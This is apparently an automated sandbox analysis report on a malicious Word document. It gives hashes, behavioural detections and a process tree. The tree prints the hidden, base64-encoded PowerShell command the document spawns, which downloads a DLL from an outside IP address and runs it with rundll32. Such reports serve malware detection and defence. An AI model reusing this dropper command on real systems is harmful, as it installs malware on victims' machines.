Analysis
-
max time kernel
120s -
max time network
138s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
12-05-2021 10:02
Static task
static1
Behavioral task
behavioral1
Sample
0a4315aced819ab564058480ffeeeb059756030d8c056605f2e0c6fc88b8b2f5.doc
Resource
win7v20210408
Behavioral task
behavioral2
Sample
0a4315aced819ab564058480ffeeeb059756030d8c056605f2e0c6fc88b8b2f5.doc
Resource
win10v20210410
General
-
Target
0a4315aced819ab564058480ffeeeb059756030d8c056605f2e0c6fc88b8b2f5.doc
-
Size
1.5MB
-
MD5
3272df3f79a0fa8c2ba601c4771b99e4
-
SHA1
90237b6a9396828465224313f1e8d1fe32190b85
-
SHA256
0a4315aced819ab564058480ffeeeb059756030d8c056605f2e0c6fc88b8b2f5
-
SHA512
f937de508da39c0f2ee844a01bb8bb31e9f3b10ab1243a92be3239d2d18d53552759d20a498e4186a56422bda3824c994903cc228bd4bea1de4903f5c61d3827
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
WINWORD.EXEdescription pid process target process PID 4048 created 2492 4048 WINWORD.EXE Explorer.EXE -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 23 1348 powershell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 4048 WINWORD.EXE 4048 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 1348 powershell.exe 1348 powershell.exe 1348 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1348 powershell.exe -
Suspicious use of SetWindowsHookEx 8 IoCs
Processes:
WINWORD.EXEpid process 4048 WINWORD.EXE 4048 WINWORD.EXE 4048 WINWORD.EXE 4048 WINWORD.EXE 4048 WINWORD.EXE 4048 WINWORD.EXE 4048 WINWORD.EXE 4048 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
WINWORD.EXEpowershell.exedescription pid process target process PID 4048 wrote to memory of 1348 4048 WINWORD.EXE powershell.exe PID 4048 wrote to memory of 1348 4048 WINWORD.EXE powershell.exe PID 1348 wrote to memory of 4200 1348 powershell.exe rundll32.exe PID 1348 wrote to memory of 4200 1348 powershell.exe rundll32.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:2492
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\0a4315aced819ab564058480ffeeeb059756030d8c056605f2e0c6fc88b8b2f5.doc" /o ""2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4048
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -nop -w hidden -command $var=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLVVyaSBodHRwOi8vMTc2LjEwLjEyNS4yMzo4MDAwL2hlYWRlcmVsZW1lbnQuanBnIC1PdXRGaWxlICRlbnY6dGVtcFx3aW5zeXMuZGxsOyBydW5kbGwzMiAkZW52OnRlbXBcd2luc3lzLmRsbCxTdGFydA=='));iex $var2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1348 -
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\winsys.dll,Start3⤵PID:4200
-
-